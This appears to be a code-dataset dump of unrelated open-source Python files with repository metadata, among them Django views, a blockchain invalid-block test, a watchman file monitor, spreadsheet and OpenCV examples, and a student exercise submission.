1ed389d448d82c91e796951f15c5ce81fbedb73e
|
52d4f77109b0ffdaf8eab8094fe90b0dbab5a595
|
refs/heads/main
| 2023-03-28T06:01:00.090517
| 2021-03-17T19:56:58
| 2021-03-17T19:56:58
| 348,491,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
# Given a list with pairs, sort on the first element.
def sort_list_with_pairs_on_first_element(collection):
collection.sort(key=lambda x:x[0])
print(collection)
# Now sort on the second element
def sort_list_with_pairs_on_second_element(collection):
collection.sort(key=lambda x: x[1])
print(collection)
|
[
"david@Davids-MacBook-Pro.local"
] |
david@Davids-MacBook-Pro.local
|
8519415c25b3fb42b6fabb878d849032a11561a9
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/131/usersdata/260/38306/submittedfiles/al10.py
|
cf5bced616d8a83beddc4f52cebb3f6fea0b85b8
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 278
|
py
|
# -*- coding: utf-8 -*-
#NÃO APAGUE A LINHA ACIMA. COMECE ABAIXO DESTA LINHA
n=int(input("digite o número de termos desejado:"))
produto=1
for i in range (1,n+1,2):
if n%2 == 0
produto=produto*((i)/(i+1))
else
produto=produto*((i+1)/(i))
print(produto)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
b422f5580abaf8f49648efea46f5591864331eb3
|
e262e64415335060868e9f7f73ab8701e3be2f7b
|
/.history/pyexcel_20201111161453.py
|
9ea777441d71ece291b7eaecf8bd2f954d7a1fdc
|
[] |
no_license
|
Allison001/developer_test
|
6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63
|
b8e04b4b248b0c10a35e93128a5323165990052c
|
refs/heads/master
| 2023-06-18T08:46:40.202383
| 2021-07-23T03:31:54
| 2021-07-23T03:31:54
| 322,807,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
from openpyxl import Workbook
from openpyxl.utils import get_column_letter
wb = Workbook()
dest_filename = 'empty_book.xlsx'
ws1 = wb.active
ws1.title = "range names"
for row in range(1, 40):
ws1.append(range(600))
ws2 = wb.create_sheet(title="Pi")
ws2['F5'] = 3.14
ws3 = wb.create_sheet(title="Data")
for row in range(10, 20):
for col in range(27, 54):
_ = ws3.cell(column=col, row=row, value="{0}".format(get_column_letter(col)))
print(ws3['AA10'].value)
ws4 = wb.create_sheet(title="test")
title1 = ("用例编号","用例模块","用例标题","用例级别","测试环境","测试输入","执行操作","预期结果","验证结果","备注")
for i in range(1,11):
ws4.cell(column=i,row=1).value="用例编号"
wb.save(filename = dest_filename)
|
[
"zhangyingxbba@gmail.com"
] |
zhangyingxbba@gmail.com
|
ab888ea5d10530619540dd87dcd6a094a9ab20c1
|
8b957ec62991c367dfc6c9247ada90860077b457
|
/test/functional/p2p_invalid_block.py
|
5d51372d2d6595212073953a66767b2570a5c199
|
[
"MIT"
] |
permissive
|
valuero-org/valuero
|
113f29046bd63c8b93160604452a99ed51367942
|
c0a8d40d377c39792e5a79d4a67f00bc592aef87
|
refs/heads/master
| 2020-05-24T17:44:46.409378
| 2019-09-09T10:18:59
| 2019-09-09T10:18:59
| 187,392,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,470
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Copyright (c) 2018-2019 The Rito Core developers
# Copyright (c) 2019 The Valuero developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test node responses to invalid blocks.
In this test we connect to one node over p2p, and test block requests:
1) Valid blocks should be requested and become chain tip.
2) Invalid block with duplicated transaction should be re-requested.
3) Invalid block with bad coinbase value should be rejected and not
re-requested.
"""
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.blocktools import *
import copy
import time
# Use the ComparisonTestFramework with 1 node: only use --testbinary.
class InvalidBlockRequestTest(ComparisonTestFramework):
''' Can either run this test as 1 node with expected answers, or two and compare them.
Change the "outcome" variable from each TestInstance object to only do the comparison. '''
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
self.tip = None
self.block_time = None
NetworkThread().start() # Start up network handling in another thread
test.run()
def get_tests(self):
if self.tip is None:
self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
self.block_time = int(time.time())+1
'''
Create a new block with an anyone-can-spend coinbase
'''
height = 1
block = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
yield TestInstance([[block, True]])
'''
Now we need that block to mature so we can spend the coinbase.
'''
test = TestInstance(sync_every_block=False)
for i in range(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.tip = block.sha256
self.block_time += 1
test.blocks_and_transactions.append([block, True])
height += 1
yield test
'''
Now we use merkle-root malleability to generate an invalid block with
same blockheader.
Manufacture a block with 3 transactions (coinbase, spend of prior
coinbase, spend of that spend). Duplicate the 3rd transaction to
leave merkle root and blockheader unchanged but invalidate the block.
'''
block2 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
# b'0x51' is OP_TRUE
tx1 = create_transaction(self.block1.vtx[0], 0, b'\x51', 5000 * COIN)
tx2 = create_transaction(tx1, 0, b'\x51', 5000 * COIN)
block2.vtx.extend([tx1, tx2])
block2.hashMerkleRoot = block2.calc_merkle_root()
block2.rehash()
block2.solve()
orig_hash = block2.sha256
block2_orig = copy.deepcopy(block2)
# Mutate block 2
block2.vtx.append(tx2)
assert_equal(block2.hashMerkleRoot, block2.calc_merkle_root())
assert_equal(orig_hash, block2.rehash())
assert(block2_orig.vtx != block2.vtx)
self.tip = block2.sha256
yield TestInstance([[block2, RejectResult(16, b'bad-txns-duplicate')], [block2_orig, True]])
height += 1
'''
Make sure that a totally screwed up block is not valid.
'''
block3 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block3.vtx[0].vout[0].nValue = 100 * COIN # Too high!
block3.vtx[0].sha256=None
block3.vtx[0].calc_sha256()
block3.hashMerkleRoot = block3.calc_merkle_root()
block3.rehash()
block3.solve()
yield TestInstance([[block3, RejectResult(16, b'bad-cb-amount')]])
if __name__ == '__main__':
InvalidBlockRequestTest().main()
|
[
"rishabhworking@gmail.com"
] |
rishabhworking@gmail.com
|
a817828844765fa43ba5993b23bb82b037a2711f
|
b4fd46f1f9c7b7d3f78df723d8aa34c8a65edb1a
|
/src/hupper/watchman.py
|
00b923fe217e9791afe2f80e24cfb82858ff3c69
|
[
"MIT"
] |
permissive
|
ProstoMaxim/hupper
|
b0bf6123c58b96eb6d97b5797fc57e390efbf513
|
46a46af2c459fb82884b205a47211b587aa05749
|
refs/heads/master
| 2020-03-29T19:50:51.316020
| 2018-09-25T15:14:43
| 2018-09-25T15:14:43
| 150,283,612
| 0
| 0
|
MIT
| 2018-09-25T14:57:55
| 2018-09-25T14:57:55
| null |
UTF-8
|
Python
| false
| false
| 4,130
|
py
|
# check ``hupper.utils.is_watchman_supported`` before using this module
import json
import os
import socket
import threading
import time
from .compat import PY2
from .interfaces import IFileMonitor
from .utils import get_watchman_sockpath
class WatchmanFileMonitor(threading.Thread, IFileMonitor):
"""
An :class:`hupper.interfaces.IFileMonitor` that uses Facebook's
``watchman`` daemon to detect changes.
``callback`` is a callable that accepts a path to a changed file.
"""
def __init__(
self,
callback,
logger,
sockpath=None,
binpath='watchman',
timeout=1.0,
**kw
):
super(WatchmanFileMonitor, self).__init__()
self.callback = callback
self.logger = logger
self.paths = set()
self.dirpaths = set()
self.lock = threading.Lock()
self.enabled = True
self.sockpath = sockpath
self.binpath = binpath
self.timeout = timeout
def add_path(self, path):
with self.lock:
dirpath = os.path.dirname(path)
if dirpath not in self.dirpaths:
self._schedule(dirpath)
self.dirpaths.add(dirpath)
if path not in self.paths:
self.paths.add(path)
def start(self):
sockpath = self._resolve_sockpath()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
sock.connect(sockpath)
self._sock = sock
self._recvbufs = []
self._send(['version'])
result = self._recv()
self.logger.debug('Connected to watchman v' + result['version'] + '.')
super(WatchmanFileMonitor, self).start()
def join(self):
try:
return super(WatchmanFileMonitor, self).join()
finally:
self._sock.close()
self._sock = None
def run(self):
while self.enabled:
try:
result = self._recv()
if 'error' in result:
self.logger.error('watchman error=' + result['error'])
elif 'subscription' in result:
root = result['root']
files = result['files']
with self.lock:
for f in files:
path = os.path.join(root, f)
if path in self.paths:
self.callback(path)
except socket.timeout:
pass
def stop(self):
self.enabled = False
def _resolve_sockpath(self):
if self.sockpath:
return self.sockpath
return get_watchman_sockpath(self.binpath)
def _schedule(self, dirpath):
self._send([
'subscribe',
dirpath,
dirpath,
{
# +1 second because we don't want any buffered changes
# if the daemon is already watching the folder
'since': int(time.time() + 1),
'expression': [
'type', 'f',
],
'fields': ['name'],
},
])
def _readline(self):
# buffer may already have a line
if len(self._recvbufs) == 1 and b'\n' in self._recvbufs[0]:
line, b = self._recvbufs[0].split(b'\n', 1)
self._recvbufs = [b]
return line
while True:
b = self._sock.recv(4096)
if not b:
raise RuntimeError('lost connection to watchman')
if b'\n' in b:
result = b''.join(self._recvbufs)
line, b = b.split(b'\n', 1)
self.buf = [b]
return result + line
self._recvbufs.append(b)
def _recv(self):
line = self._readline()
if not PY2:
line = line.decode('utf8')
return json.loads(line)
def _send(self, msg):
cmd = json.dumps(msg)
if not PY2:
cmd = cmd.encode('ascii')
self._sock.sendall(cmd + b'\n')
|
[
"michael@merickel.org"
] |
michael@merickel.org
|
17fe14c4e6fa06e9f9f2562f8672e56c946a0ac6
|
5ca85847885c6fd6f9728b0b2dffb66e96a81a1d
|
/hemlock/app/routes/base_routing.py
|
c31895ffe2bf37417fd7aa109647fcf91a13ebb4
|
[] |
no_license
|
syfreed/hemlock_test2
|
682d843636883a6a2b883932cd7282e9b865ebcd
|
61933fd17630ddd1bb46d8f2090b1b039a3b4e99
|
refs/heads/master
| 2020-08-03T11:21:18.460905
| 2019-09-29T22:36:36
| 2019-09-29T22:36:36
| 211,733,895
| 0
| 0
| null | 2019-10-22T14:21:27
| 2019-09-29T22:25:30
|
Python
|
UTF-8
|
Python
| false
| false
| 1,489
|
py
|
"""Base routing functions"""
from hemlock.app.factory import bp, db, login_manager
from hemlock.database.models import Participant, Navbar, Brand, Navitem, Dropdownitem
from hemlock.database.private import DataStore
from flask import current_app, url_for
@login_manager.user_loader
def load_user(id):
return Participant.query.get(int(id))
@bp.before_app_first_request
def init_app():
"""Create database tables and initialize data storage models
Additionally, set a scheduler job to log the status periodically.
"""
db.create_all()
if not DataStore.query.first():
DataStore()
if not Navbar.query.filter_by(name='researcher_navbar').first():
create_researcher_navbar()
db.session.commit()
current_app.apscheduler.add_job(
func=log_current_status, trigger='interval',
seconds=current_app.status_log_period.seconds,
args=[current_app._get_current_object()], id='log_status'
)
def create_researcher_navbar():
navbar = Navbar(name='researcher_navbar')
Brand(bar=navbar, label='Hemlock')
Navitem(
bar=navbar, url=url_for('hemlock.participants'), label='Participants')
Navitem(bar=navbar, url=url_for('hemlock.download'), label='Download')
Navitem(bar=navbar, url=url_for('hemlock.logout'), label='Logout')
return navbar
def log_current_status(app):
with app.app_context():
ds = DataStore.query.first()
ds.log_status()
db.session.commit()
|
[
"dsbowen@wharton.upenn.edu"
] |
dsbowen@wharton.upenn.edu
|
80d23caed9eb691e211165bc984de9bfe7b6c3d1
|
da9ce50833e5292d27e14d31ee90c5bcc410d71b
|
/survol/sources_types/CIM_Process/wbem_process_info.py
|
a51c26e47d53d0bdf1863f69b2a7c8f529808775
|
[] |
no_license
|
Tiancheng-Luo/survol
|
10367b6b923f7095574436bb44fd5189b1e49160
|
30c7f771010462cd865480986abfe1045429f021
|
refs/heads/master
| 2022-11-26T16:02:46.852058
| 2020-07-25T07:28:34
| 2020-07-25T07:28:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,277
|
py
|
#!/usr/bin/env python
"""
WBEM CIM_Process information.
"""
import sys
import lib_util
import lib_common
import lib_wbem
from lib_properties import pc
Usable = lib_util.UsableLinux
CanProcessRemote = True
def Main():
# TODO: can_process_remote should be suppressed because it duplicates CanProcessRemote
cgiEnv = lib_common.CgiEnv(can_process_remote=True)
pid = int(cgiEnv.GetId())
machine_name = cgiEnv.GetHost()
grph = cgiEnv.GetGraph()
cimom_url = lib_wbem.HostnameToWbemServer(machine_name)
DEBUG("wbem_process_info.py currentHostname=%s pid=%d machine_name=%s cimom_url=%s",
lib_util.currentHostname, pid, machine_name, cimom_url)
conn_wbem = lib_wbem.WbemConnection(cimom_url)
name_space = "root/cimv2"
try:
inst_lists = conn_wbem.ExecQuery("WQL", 'select * from CIM_Process where Handle="%s"' % pid, name_space)
except:
lib_common.ErrorMessageHtml("Error:" + str(sys.exc_info()))
class_name = "CIM_Process"
dict_props = {"Handle": pid}
root_node = lib_util.EntityClassNode(class_name, name_space, cimom_url, "WBEM")
# There should be only one object, hopefully.
for an_inst in inst_lists:
dict_inst = dict(an_inst)
host_only = lib_util.EntHostToIp(cimom_url)
if lib_util.IsLocalAddress(host_only):
uri_inst = lib_common.gUriGen.UriMakeFromDict(class_name, dict_props)
else:
uri_inst = lib_common.RemoteBox(host_only).UriMakeFromDict(class_name, dict_props)
grph.add((root_node, lib_common.MakeProp(class_name), uri_inst))
url_namespace = lib_wbem.NamespaceUrl(name_space, cimom_url, class_name)
nod_namespace = lib_common.NodeUrl(url_namespace)
grph.add((root_node, pc.property_cim_subnamespace, nod_namespace))
# None properties are not printed.
for iname_key in dict_inst:
iname_val = dict_inst[iname_key]
# TODO: If this is a reference, create a Node !!!!!!!
if not iname_val is None:
grph.add((uri_inst, lib_common.MakeProp(iname_key), lib_common.NodeLiteral(iname_val)))
# TODO: Call the method Associators(). Idem References().
cgiEnv.OutCgiRdf()
if __name__ == '__main__':
Main()
|
[
"remi.chateauneu@gmail.com"
] |
remi.chateauneu@gmail.com
|
6ce9270ac0a7bc5542a7cd5fc4ade24fab776cb6
|
907b3bbd44c95be1542a36feaadb6a71b724579f
|
/files/usr/tmp/pip-build-nyxh8e0k/google-cloud-vision/google/cloud/vision/likelihood.py
|
6239efe18251f74ee337f3573ab128b3df84470d
|
[] |
no_license
|
vo0doO/com.termux
|
2d8f536c1a5dbd7a091be0baf181e51f235fb941
|
c97dd7b906e5ef3ec157581fd0bcadd3e3fc220e
|
refs/heads/master
| 2020-12-24T09:40:30.612130
| 2016-11-21T07:47:25
| 2016-11-21T07:47:25
| 73,282,539
| 2
| 2
| null | 2020-07-24T21:33:03
| 2016-11-09T12:33:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,000
|
py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Likelihood constants returned from Vision API."""
class Likelihood(object):
"""A representation of likelihood to give stable results across upgrades.
See:
https://cloud.google.com/vision/reference/rest/v1/images/annotate#likelihood
"""
UNKNOWN = 'UNKNOWN'
VERY_UNLIKELY = 'VERY_UNLIKELY'
UNLIKELY = 'UNLIKELY'
POSSIBLE = 'POSSIBLE'
LIKELY = 'LIKELY'
VERY_LIKELY = 'VERY_LIKELY'
|
[
"kirsanov.bvt@gmail.com"
] |
kirsanov.bvt@gmail.com
|
4dd509a2a70827664579c9c6793d408263d2abd3
|
2c5101623d0e12e66afac57a5599e9b45c0e65f9
|
/groupchat/venv/lib/python3.5/site-packages/django_eventstream/utils.py
|
ba6393f92d586c4bd344bd993ef41d2e8409420c
|
[] |
no_license
|
shushantkumar/chatapp-django-channels
|
bc40aa600a6a59c379d6f5b987ddfae71abb5dad
|
6ec71d87134615769025ec9cc18da9d614d1d499
|
refs/heads/master
| 2020-03-17T23:10:36.280696
| 2018-05-24T05:08:06
| 2018-05-24T05:08:06
| 134,034,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,775
|
py
|
import json
import threading
import importlib
import six
from werkzeug.http import parse_options_header
from django.conf import settings
from django.http import HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
from gripcontrol import HttpStreamFormat
from django_grip import publish
try:
from urllib import quote
except ImportError:
from urllib.parse import quote
tlocal = threading.local()
# return dict of (channel, last-id)
def parse_grip_last(s):
parsed = parse_options_header(s, multiple=True)
out = {}
for n in range(0, len(parsed), 2):
channel = parsed[n]
params = parsed[n + 1]
last_id = params.get('last-id')
if last_id is None:
raise ValueError('channel "%s" has no last-id param' % channel)
out[channel] = last_id
return out
# return dict of (channel, last-id)
def parse_last_event_id(s):
out = {}
parts = s.split(',')
for part in parts:
channel, last_id = part.split(':')
out[channel] = last_id
return out
def make_id(ids):
id_parts = []
for channel, id in six.iteritems(ids):
enc_channel = quote(channel)
id_parts.append('%s:%s' % (enc_channel, id))
return ','.join(id_parts)
def build_id_escape(s):
out = ''
for c in s:
if c == '%':
out += '%%'
else:
out += c
return out
def sse_encode_event(event_type, data, event_id=None, escape=False):
data_str = json.dumps(data, cls=DjangoJSONEncoder)
if escape:
event_type = build_id_escape(event_type)
data_str = build_id_escape(data_str)
out = 'event: %s\n' % event_type
if event_id:
out += 'id: %s\n' % event_id
out += 'data: %s\n\n' % data_str
return out
def sse_error_response(condition, text, extra={}):
data = {'condition': condition, 'text': text}
for k, v in six.iteritems(extra):
data[k] = v
body = sse_encode_event('stream-error', data, event_id='error')
return HttpResponse(body, content_type='text/event-stream')
def publish_event(channel, event_type, data, pub_id, pub_prev_id,
skip_user_ids=[]):
content_filters = []
if pub_id:
event_id = '%I'
content_filters.append('build-id')
else:
event_id = None
content = sse_encode_event(event_type, data, event_id=event_id, escape=bool(pub_id))
meta = {}
if skip_user_ids:
meta['skip_users'] = ','.join(skip_user_ids)
publish(
'events-%s' % quote(channel),
HttpStreamFormat(content, content_filters=content_filters),
id=pub_id,
prev_id=pub_prev_id,
meta=meta)
def publish_kick(user_id, channel):
msg = 'Permission denied to channels: %s' % channel
data = {'condition': 'forbidden', 'text': msg, 'channels': [channel]}
content = sse_encode_event('stream-error', data, event_id='error')
meta = {'require_sub': 'events-%s' % channel}
publish(
'user-%s' % user_id,
HttpStreamFormat(content),
id='kick-1',
meta=meta)
publish(
'user-%s' % user_id,
HttpStreamFormat(close=True),
id='kick-2',
prev_id='kick-1',
meta=meta)
def load_class(name):
at = name.rfind('.')
if at == -1:
raise ValueError('class name contains no \'.\'')
module_name = name[0:at]
class_name = name[at + 1:]
return getattr(importlib.import_module(module_name), class_name)()
# load and keep in thread local storage
def get_class(name):
if not hasattr(tlocal, 'loaded'):
tlocal.loaded = {}
c = tlocal.loaded.get(name)
if c is None:
c = load_class(name)
tlocal.loaded[name] = c
return c
def get_class_from_setting(setting_name, default=None):
if hasattr(settings, setting_name):
return get_class(getattr(settings, setting_name))
elif default:
return get_class(default)
else:
return None
def get_storage():
return get_class_from_setting('EVENTSTREAM_STORAGE_CLASS')
def get_channelmanager():
return get_class_from_setting(
'EVENTSTREAM_CHANNELMANAGER_CLASS',
'django_eventstream.channelmanager.DefaultChannelManager')
|
[
"shushantkmr2@gmail.com"
] |
shushantkmr2@gmail.com
|
bb92a4fbe5cfa6ba62e826caf72954a732bb9e22
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_emasculates.py
|
a1b9e9f4cad8bf9f0e90f0b93fdf68dd57c412e6
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
#calss header
class _EMASCULATES():
def __init__(self,):
self.name = "EMASCULATES"
self.definitions = emasculate
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['emasculate']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
af77c1523d4d9b222680e0262c87780f066ae5fe
|
cabdd862b94cb37924c9b73bdab3a7a6f72f3506
|
/bin/annex-passport
|
369183ab4d99e6308eb46bf51615549b2ce55766
|
[
"Unlicense"
] |
permissive
|
umeboshi2/dotfiles
|
313114284e300f552a5e77b1ef8c9bb34833caae
|
8aa56f93bd4efc1beaa56762d286450a453a9e58
|
refs/heads/master
| 2023-01-14T03:51:51.055141
| 2021-02-17T23:40:37
| 2021-02-17T23:40:37
| 18,471,913
| 0
| 2
|
Unlicense
| 2022-12-26T21:34:27
| 2014-04-05T17:18:31
|
Emacs Lisp
|
UTF-8
|
Python
| false
| false
| 1,421
|
#!/usr/bin/env python
import os, sys
import subprocess
import argparse
# a simple script to mount and unmount removable passport
# drive in annex chroot.
passport_mediapath = 'media/umeboshi/passport'
annex_chroot = '/var/lib/schroot/mount/annex'
main_mntpt = os.path.join('/', passport_mediapath)
annex_passport = os.path.join(annex_chroot, passport_mediapath)
def is_passport_mounted():
return annex_passport in file('/proc/mounts').read()
def mount_passport():
if is_passport_mounted():
raise RuntimeError, "Passport already mounted"
cmd = ['sudo', 'mount', '--bind', main_mntpt, annex_passport]
subprocess.check_call(cmd)
def umount_passport():
if not is_passport_mounted():
raise RuntimeError, "Passport not mounted"
cmd = ['sudo', 'umount', annex_passport]
subprocess.check_call(cmd)
if is_passport_mounted():
raise RuntimeError, "Passport still mounted"
parser = argparse.ArgumentParser()
parser.add_argument('command', default=None, nargs="?")
args = parser.parse_args()
ACTIONFUN = dict(mount=mount_passport, umount=umount_passport)
command = args.command
if command is None:
if is_passport_mounted():
command = 'umount'
else:
command = 'mount'
if command not in ACTIONFUN:
raise RuntimeError, "Unknown command: %s" % command
#print "command", command
ACTIONFUN[command]()
print "Annex %sed." % command
|
[
"joseph.rawson.works@littledebian.org"
] |
joseph.rawson.works@littledebian.org
|
|
efff35648033dc2420b00bdc78193848dab512cb
|
fb5a99b06d2525c46ff24b97cff37ea0a14cc0ca
|
/opencv/convert_to_grayscale.py
|
ec6e28a4a805bdda7a25e24d23ae9c7066a73d97
|
[] |
no_license
|
khx0/image-processing
|
efac3d1e39a2ce67701a534633ce8f9af2ba35fe
|
9d173b6b298d511583237011b0ffbcd01f3a1fda
|
refs/heads/master
| 2020-03-23T09:48:34.657459
| 2018-08-29T11:15:08
| 2018-08-29T11:15:08
| 141,408,649
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
##########################################################################################
# author: Nikolas Schnellbaecher
# contact: nikolas.schnellbaecher@bioquant.uni-heidelberg.de
# date: 2018-08-28
# file: convert_to_grayscale.py
# requires: OpenCV
# https://opencv.org
# Tested with Python 3.7.0 and OpenCV version 3.4.2
##########################################################################################
import sys
import time
import datetime
import os
import math
import numpy as np
import matplotlib.pyplot as plt
# import OpenCV python bindings
import cv2
def ensure_dir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
now = datetime.datetime.now()
now = "%s-%s-%s" %(now.year, str(now.month).zfill(2), str(now.day).zfill(2))
BASEDIR = os.path.dirname(os.path.abspath(__file__))
RAWDIR = os.path.join(BASEDIR, 'raw')
OUTDIR = os.path.join(BASEDIR, 'out')
ensure_dir(RAWDIR)
if __name__ == '__main__':
filename = 'test_image.png'
img = cv2.imread(os.path.join(RAWDIR, filename))
print("RGB image shape =", img.shape)
# convert RGB 3 channel image to grayscale
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
print("Grayscale image shape =", img_gray.shape)
# plot grayscale image using matplotlib's imshow command
fig, ax = plt.subplots()
ax.imshow(img_gray,
interpolation = 'nearest',
cmap = plt.cm.gray)
plt.show()
|
[
"khx0@posteo.net"
] |
khx0@posteo.net
|
c886e1c66c831d014b2619c235b6c78fbff842fb
|
0874ecce812388593a34014cad26d3b4959d07ac
|
/awards/views.py
|
bc491a3653604b8ff42c8c15273d84fadf3688b1
|
[
"MIT"
] |
permissive
|
melissa-koi/awwardsclone
|
d990f82eb9d1354a54af68d7fa61fe5856bfd2c1
|
b82447cea82672038ea9fa9d9ca9867bff3c35f0
|
refs/heads/main
| 2023-06-01T12:20:05.315928
| 2021-06-03T15:31:21
| 2021-06-03T15:31:21
| 372,236,218
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,212
|
py
|
from django.db.models import Avg, F, Sum
from django.shortcuts import render, redirect
from .forms import RegisterForm, RateForm, UploadWeb, CreateProfileForm, UserUpdateForm, ProfileUpdateForm
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .models import Website, Rate,Profile
from django.contrib.auth.models import User
# Create your views here.
@login_required(login_url='/login/')
def home(request):
title = "Home Page"
cards = Website.get_all()
return render(request, 'index.html' ,{"title": title, "cards": cards})
@login_required(login_url='/login/')
def site(request, pk):
title= "site"
photo = Website.objects.get(id=pk)
site = Website.objects.get(id=pk)
rates = Rate.objects.filter(website=site)
user = request.user
if request.method == 'POST':
form = RateForm(request.POST)
if form.is_valid():
rate = form.save(commit=False)
rate.user = user
rate.website = site
rate.save()
else:
form = RateForm()
return render(request, 'site.html', {"title": title, "photo": photo, "form":form, "rates":rates})
@login_required(login_url='/login/')
def post_website(request):
current_user = request.user
print(current_user)
if request.method == "POST":
form = UploadWeb(request.POST, request.FILES)
if form.is_valid():
img = form.save(commit=False)
img.author =current_user
img.save()
return redirect('home')
else:
form = UploadWeb()
return render(request, 'post_website.html', {"form":form})
@login_required(login_url='/login/')
def profile(request,username):
title="profile"
site = Website.get_user(username)
profile = Profile.get_user(username)
print(request.user)
return render(request, 'profile.html', {"title": title, "cards":site, "profiles":profile})
@login_required(login_url='/login/')
def update_profile(request,profile_id):
user=User.objects.get(pk=profile_id)
if request.method == "POST":
u_form = UserUpdateForm(request.POST,instance=request.user)
p_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request,f"You Have Successfully Updated Your Profile!")
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
return render(request,'update_profile.html',{"u_form":u_form, "p_form":p_form})
@login_required(login_url='/login/')
def search_results(request):
if 'projects' in request.GET and request.GET["projects"]:
search_term = request.GET.get("projects")
searched_project = Website.get_projects(search_term)
message = f'{search_term}'
return render(request, 'search.html',{"message":message,"cards": searched_project})
else:
message = "You haven't searched for any term"
return render(request, 'search.html',{"message":message})
def registerUser(request):
form = RegisterForm()
if request.method == 'POST':
form = RegisterForm(request.POST)
if form.is_valid():
form.save()
return redirect('login')
else:
form = RegisterForm()
return render(request, 'accounts/register.html', {'form':form})
def loginUser(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
if username and password:
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('home')
else:
messages.error(request, 'Username or Password is Incorrect')
else:
messages.error(request, 'Fill out all the fields')
return render(request, 'accounts/login.html', {})
def logoutUser(request):
logout(request)
return redirect('home')
|
[
"melissawangui3@gmail.com"
] |
melissawangui3@gmail.com
|
8824696e2db2d6a34fb6fc5a99c2eac887d2018b
|
20e9106fd6398691dcfe95c18d75bf1e09d28369
|
/runtime/Python2/src/antlr4/ParserRuleContext.py
|
f0eb4995f6079786342c04a78b4764390c69a617
|
[
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
alvarogarcia7/antlr4
|
4eb30d1e79adc31fe1901129acc2b4f91a1c0657
|
82372aae2ce73abe5e087a159a517a0890224fb7
|
refs/heads/master
| 2021-01-04T02:41:55.596897
| 2016-12-10T00:05:11
| 2016-12-10T00:05:11
| 76,113,547
| 0
| 0
| null | 2016-12-10T13:15:45
| 2016-12-10T13:15:45
| null |
UTF-8
|
Python
| false
| false
| 5,715
|
py
|
# Copyright (c) 2012-2016 The ANTLR Project. All rights reserved.
# Use of this file is governed by the BSD 3-clause license that
# can be found in the LICENSE.txt file in the project root.
#* A rule invocation record for parsing.
#
# Contains all of the information about the current rule not stored in the
# RuleContext. It handles parse tree children list, Any ATN state
# tracing, and the default values available for rule indications:
# start, stop, rule index, current alt number, current
# ATN state.
#
# Subclasses made for each rule and grammar track the parameters,
# return values, locals, and labels specific to that rule. These
# are the objects that are returned from rules.
#
# Note text is not an actual field of a rule return value; it is computed
# from start and stop using the input stream's toString() method. I
# could add a ctor to this so that we can pass in and store the input
# stream, but I'm not sure we want to do that. It would seem to be undefined
# to get the .text property anyway if the rule matches tokens from multiple
# input streams.
#
# I do not use getters for fields of objects that are used simply to
# group values such as this aggregate. The getters/setters are there to
# satisfy the superclass interface.
from antlr4.RuleContext import RuleContext
